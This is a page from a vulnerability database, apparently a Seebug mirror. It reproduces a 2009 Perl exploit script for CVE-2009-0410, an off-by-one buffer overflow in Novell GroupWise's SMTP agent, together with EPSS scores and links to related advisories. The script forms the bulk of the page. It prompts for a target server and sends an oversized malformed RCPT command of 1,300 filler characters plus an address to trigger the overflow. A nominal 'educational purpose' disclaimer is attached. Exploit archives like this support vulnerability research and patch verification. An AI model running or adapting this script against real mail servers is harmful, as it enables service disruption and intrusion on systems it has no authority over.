Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:66279
HistoryJul 01, 2014 - 12:00 a.m.

Novell GroupWise <= 8.0 Malformed RCPT command Off-by-one Exploit

2014-07-0100:00:00
Root
www.seebug.org
10

0.919 High

EPSS

Percentile

98.7%

JSON

No description provided by source.


                                                #!usr/bin/perl -w

#######################################################################################
###############################QUICK AND DIRTY EXPLOIT#################################
#######################################################################################
#   Off-by-one error in the SMTP daemon in GroupWise Internet Agent (GWIA)
#    in Novell GroupWise 6.5x, 7.0, 7.01, 7.02, 7.03, 7.03HP1a, and 8.0 allows
#    remote attackers to execute arbitrary code via a long e-mail address in a
#    malformed RCPT command, leading to a buffer overflow.
#    Refer:
#    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0410
#
#    To run this exploit on MS Windows replace &#34;#!usr/bin/perl -w&#34; with
#     &#34;#!Installation_path_for_perl -w&#34; (say #!C:/Program Files/Perl/bin/perl -w)
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
#        Author:    Praveen Darshanam
#        Email:     praveen[underscore]recker[at]sify.com\
#         Blog:        http://www.darshanams.blogspot.com/
#        Date:      04th February, 2009
#
########Thanx to str0ke, milw0rm, @rp m@n, an all the security folks####################
########################################################################################


use Net::SMTP;
print &#34;***SMTP module is working fine***\n&#34;;


$buff=&#34;D&#34; x 1300;
print &#34;Enter Vulnerable Novell GroupWise SMTP Server Domain Name\n&#34;;
$smtp_vuln_server_name=&#60;STDIN&#62;;
chop($smtp_vuln_server_name);

$smtp_attack=Net::SMTP-&#62;new(&#34;$smtp_vuln_server_name&#34;);
print&#34;\nEnter your/from mail ID here\n&#34;;
$$mail_from=&#60;STDIN&#62;;
chop($mail_from);


print&#34;\nEnter Recepient mail ID\n&#34;;
$to_mail_id=&#60;STDIN&#62;;
chop($to_mail_id);

$mal_buffer=$buff.$to_mail_id;

$smtp_attack-&#62;mail($mail_from);
$smtp_attack-&#62;to($mal_buffer);

$smtp_attack-&#62;data();
$smtp_attack-&#62;datasend(&#34;Attacking...&#34;);

$smtp_attack-&#62;quit();

# milw0rm.com [2009-02-04]

Related

checkpoint_advisories 2
zdi 1
cvelist 1
packetstorm 1
cve 1
exploitpack 1
seebug 1
prion 1
exploitdb 1
checkpoint_advisories
checkpoint_advisories
Novell Groupwise Internet Agent RCPT Command Buffer Overflow (CVE-2009-0410)
2009-11-18 00:00:00
Preemptive Protection against Novell Groupwise Internet Agent RCPT Command Buffer Overflow
2009-01-26 00:00:00
zdi
zdi
Novell Netware Groupwise GWIA RCPT Command Buffer Overflow Vulnerability
2009-02-02 00:00:00
cvelist
cvelist
CVE-2009-0410
2009-02-03 19:00:00
packetstorm
packetstorm
Novell GroupWise 8.0 RCPT Off-By-One Exploit
2009-02-04 00:00:00
cve
cve
CVE-2009-0410
2009-02-03 19:30:00
exploitpack
exploitpack
Novell Groupwise 8.0 - RCPT Off-by-One
2009-02-04 00:00:00
seebug
seebug
Novell GroupWise &lt;= 8.0 Malformed RCPT command Off-by-one Exploit
2009-02-04 00:00:00
prion
prion
Buffer overflow
2009-02-03 19:30:00
exploitdb
exploitdb
Novell Groupwise 8.0 - &#039;RCPT&#039; Off-by-One
2009-02-04 00:00:00

0.919 High

EPSS

Percentile

98.7%

JSON
Related for SSV:66279
checkpoint_advisories2zdi1cvelist1packetstorm1cve1exploitpack1seebug1prion1exploitdb1